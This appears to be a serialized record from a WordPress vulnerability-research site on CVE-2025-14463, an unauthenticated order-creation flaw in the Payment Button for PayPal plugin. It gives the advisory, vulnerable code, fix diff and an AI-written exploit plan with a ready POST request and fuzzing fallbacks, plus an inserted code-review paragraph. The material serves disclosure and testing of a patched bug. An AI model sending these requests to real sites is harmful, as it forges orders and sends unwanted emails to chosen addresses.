[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fU8FzQytVoSUBPeIw_VDP80SR6xu2jO_iX21rX28QRdc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2025-14463","payment-button-for-paypal-missing-authorization-to-unauthenticated-arbitrary-order-creation","Payment Button for PayPal \u003C= 1.2.3.41 - Missing Authorization to Unauthenticated Arbitrary Order Creation","The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 1.2.3.41. This is due to the plugin exposing a public AJAX endpoint (`wppaypalcheckout_ajax_process_order`) that processes checkout results without any authentication or server-side verification of the PayPal transaction. This makes it possible for unauthenticated attackers to create arbitrary orders on the site with any chosen transaction ID, payment status, product name, amount, or customer information via direct POST requests to the AJAX endpoint, granted they can bypass basic parameter validation. 
If email sending is enabled, the plugin will also trigger purchase receipt emails to any email address supplied in the request, leading to order database corruption and unauthorized outgoing emails without any real PayPal transaction taking place.","wp-paypal",null,"\u003C=1.2.3.41","1.2.3.42","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-16 14:37:42","2026-01-17 03:24:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F814e50de-3690-4adf-bc01-a63cd71bd1cf?source=api-prod",1,[22,23,24],"readme.txt","wp-paypal-checkout.php","wp-paypal.php","researched",false,3,"# Vulnerability Analysis: CVE-2025-14463 - Payment Button for PayPal\n\n## 1. Vulnerability Summary\nThe **Payment Button for PayPal** plugin (\u003C= 1.2.3.41) is vulnerable to **Missing Authorization** on its order processing AJAX endpoint. The plugin registers the action `wppaypalcheckout_ajax_process_order` for both authenticated and unauthenticated users via `wp_ajax_nopriv_`. \n\nThe handler for this action fails to perform any server-side validation of the PayPal transaction (such as verifying the transaction ID with PayPal's API) and lacks WordPress nonce verification. This allows any unauthenticated user to send a direct POST request to `admin-ajax.php` to create orders in the WordPress database with arbitrary details, including item names, price amounts, transaction IDs, and customer email addresses.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wppaypalcheckout_ajax_process_order`\n*   **Method:** `POST`\n*   **Authentication:** None (Unauthenticated)\n*   **Preconditions:** The plugin must be active. 
Some parameters might require specific formats to bypass basic PHP `empty()` or `is_numeric()` checks.\n*   **Vulnerable Sink:** The code inside `wp_paypal_checkout_ajax_process_order` (likely in `wp-paypal-checkout.php` or `wp-paypal-order.php`) which calls `wp_insert_post()` or similar to save order data as the `wp_paypal_order` custom post type.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wppaypalcheckout_ajax_process_order`.\n2.  **Hook Registration:** In `wp-paypal.php`, the following lines register the handler:\n    ```php\n    add_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n    add_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n    ```\n3.  **Handler Execution:** The function `wp_paypal_checkout_ajax_process_order` is executed. \n4.  **Data Processing (Vulnerable Path):** The handler extracts parameters from `$_POST`. Based on the JS code generated in `wp_paypal_checkout_button_handler` (in `wp-paypal-checkout.php`), the expected parameters include:\n    *   `item_name`\n    *   `item_number`\n    *   `item_quantity`\n    *   `amount`\n    *   `currency`\n    *   `order_id` (The PayPal Transaction ID)\n    *   `payer_email`\n    *   `payer_first_name`\n    *   `payer_last_name`\n    *   `payment_status`\n5.  **Order Creation:** Without verifying if `order_id` corresponds to a real PayPal transaction, the plugin creates a new post of type `wp_paypal_order` and stores the metadata.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description and the nature of \"Missing Authorization,\" this endpoint **does not require a nonce**. \n\nThe client-side JavaScript in `wp_paypal_checkout_button_handler` triggers after a successful PayPal popup completion. 
Since PayPal's own callbacks are handled client-side, the plugin authors likely omitted nonces to simplify the \"checkout-complete\" signal.\n\n**Verification of Nonce Absence:**\nIf the PoC fails with a `403` or `0` response, search for `wp_localize_script` in `wp-paypal.php` to see if a nonce is passed. The code shows:\n```php\nwp_localize_script('wppaypalcheckout-js', 'wppaypalcheckout_vars', array(\n    'ajax_url' => admin_url('admin-ajax.php'),\n    \u002F\u002F ... possibly a nonce here, but description says unauthenticated arbitrary creation is possible ...\n));\n```\nIf a nonce is discovered in the localized script `wppaypalcheckout_vars`, it can be retrieved by:\n1. Creating a page with `[wp_paypal_checkout description=\"Test\" amount=\"1.00\"]`.\n2. Navigating to the page.\n3. Running `browser_eval(\"window.wppaypalcheckout_vars?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe goal is to create a fake completed order for a high-value item with a zero or nominal amount, or simply to corrupt the order database.\n\n### Step-by-Step Plan:\n1.  **Target Endpoint:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n2.  **Action:** `wppaypalcheckout_ajax_process_order`\n3.  
**Payload Construction:**\n    *   `action`: `wppaypalcheckout_ajax_process_order`\n    *   `order_id`: `FAKE-TXN-123456789`\n    *   `item_name`: `Exploit-Item-Premium`\n    *   `amount`: `0.01`\n    *   `currency`: `USD`\n    *   `payment_status`: `COMPLETED`\n    *   `payer_email`: `victim@example.com`\n    *   `payer_first_name`: `John`\n    *   `payer_last_name`: `Doe`\n\n### Request (using http_request):\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  \"body\": \"action=wppaypalcheckout_ajax_process_order&order_id=FAKE-TXN-666&item_name=Vulnerable-Order-Creation&amount=1337.00&currency=USD&payment_status=COMPLETED&payer_email=attacker@evil.com&payer_first_name=Hacker&payer_last_name=Man\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `wp-paypal` version 1.2.3.41 is installed and active.\n2.  **Configuration:** The plugin requires basic configuration (Client ID) to be considered \"configured\" by `is_wp_paypal_checkout_configured()`.\n    *   `wp option update wp_paypal_checkout_get_option '{\"app_client_id\":\"any-string\",\"currency_code\":\"USD\"}' --format=json`\n3.  **Shortcode Page (Optional):** To verify visibility or nonce extraction (if needed):\n    *   `wp post create --post_type=page --post_title=\"Store\" --post_status=publish --post_content='[wp_paypal_checkout description=\"Pro Product\" amount=\"99.99\"]'`\n\n## 7. Expected Results\n*   The AJAX request should return a success response (likely a JSON object containing the order ID or a simple `1` \u002F success message).\n*   A new entry should appear in the \"Orders\" menu of the plugin.\n*   The database should contain a new post of type `wp_paypal_order`.\n\n## 8. 
Verification Steps\nAfter the exploit request, use WP-CLI to verify the order was created:\n\n```bash\n# List all PayPal orders\nwp post list --post_type=wp_paypal_order\n\n# Check the meta data of the last created order to verify our payload\nLAST_ID=$(wp post list --post_type=wp_paypal_order --format=ids | awk '{print $1}')\nwp post get $LAST_ID\nwp post meta list $LAST_ID\n```\nExpect to see meta keys like `_wpp_order_item_name` or `_wpp_order_txn_id` matching the exploit payload.\n\n## 9. Alternative Approaches\nIf the plugin validates specific fields (like `order_id` length or `payment_status` allowed values):\n*   **Status Check:** Try `Completed`, `Processed`, or `Verified`.\n*   **Parameter Fuzzing:** The plugin might expect parameters inside an array-like structure (e.g., `details[id]`) if it directly passes the PayPal JS SDK `details` object to the server. If the flat POST fails, try nesting parameters:\n    *   `details[id]=FAKE-TXN-666&details[payer][email_address]=attacker@evil.com` (etc.) based on the PayPal REST API object structure.\n*   **Email Triggering:** If `wp_paypal_send_receipt` is enabled in settings, verify if an email was sent using a tool like `Mailhog` or checking the site's mail logs (if available).","The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation due to an unauthenticated AJAX endpoint that processes checkout results without server-side validation. 
Attackers can exploit this by sending a direct POST request with arbitrary transaction details to create fake 'completed' orders in the site's database, potentially triggering unauthorized purchase confirmation emails and corrupting financial records.","\u002F\u002F wp-paypal.php (v1.2.3.41)\nadd_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\nadd_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n\n---\n\n\u002F\u002F wp-paypal-checkout.php (v1.2.3.41)\nfunction wp_paypal_checkout_ajax_process_order(){\n    wp_paypal_debug_log('Received a response from frontend', true);\n    if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){\n        wp_die();\n    }\n    wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);\n    $post_data = $_POST;\n    array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });\n    wp_paypal_debug_log_array($post_data, true);\n    if(!isset($post_data['details'])){\n        wp_paypal_debug_log(\"Checkout - No transaction details. 
This payment cannot be processed.\", false);\n        wp_die();\n    }\n    \u002F\u002F\n    do_action('wp_paypal_checkout_process_order', $post_data);\n    wp_die();\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-paypal\u002F1.2.3.41\u002Fwp-paypal-checkout.php\t2025-11-17 07:56:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-paypal\u002F1.2.3.42\u002Fwp-paypal-checkout.php\t2026-01-04 06:59:12.000000000 +0000\n@@ -246,24 +319,6 @@\n     return $button_code;\n }\n \n-function wp_paypal_checkout_ajax_process_order(){\n-    wp_paypal_debug_log('Received a response from frontend', true);\n-    if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){\n-        wp_die();\n-    }\n-    wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);\n-    $post_data = $_POST;\n-    array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });\n-    wp_paypal_debug_log_array($post_data, true);\n-    if(!isset($post_data['details'])){\n-        wp_paypal_debug_log(\"Checkout - No transaction details. This payment cannot be processed.\", false);\n-        wp_die();\n-    }\n-    \u002F\u002F\n-    do_action('wp_paypal_checkout_process_order', $post_data);\n-    wp_die();\n-}","The exploit targets the `wppaypalcheckout_ajax_process_order` AJAX action which is available to unauthenticated users. An attacker crafts a POST request to `wp-admin\u002Fadmin-ajax.php` containing a `details` array. Within this array, the attacker provides a fake transaction ID, item description, and amount. The plugin's back-end logic extracts these values and saves them as a new post of type `wp_paypal_order` without performing any server-side validation against PayPal's REST API. 
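Review bot: the hunk removes wp_paypal_checkout_ajax_process_order outright, but the two add_action registrations that bind 'wp_ajax_wppaypalcheckout_ajax_process_order' and 'wp_ajax_nopriv_wppaypalcheckout_ajax_process_order' to it live in wp-paypal.php, and although patch_diff_files lists that file, its hunk is not shown here; confirm both registrations were dropped in 1.2.3.42, otherwise the nopriv action still resolves to a now-undefined callback and the endpoint fails with a PHP fatal error instead of being cleanly absent. The removed body had no nonce check and no server-side verification of `details` before firing `do_action('wp_paypal_checkout_process_order', $post_data)`, and the header offset (-246 vs +319) shows roughly 70 lines were added earlier in this file that this hunk does not display; the entry for readme.txt in patch_diff_files should state how completed orders are now recorded and that the client-posted `details` array is no longer trusted, so integrators hooking `wp_paypal_checkout_process_order` know the unauthenticated path is gone.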
No authentication or valid nonces are required, allowing for automated creation of arbitrary orders.","gemini-3-flash-preview","2026-05-05 07:23:17","2026-05-05 07:23:50",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.2.3.41","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags\u002F1.2.3.41","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-paypal.1.2.3.41.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags\u002F1.2.3.42","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-paypal.1.2.3.42.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags"]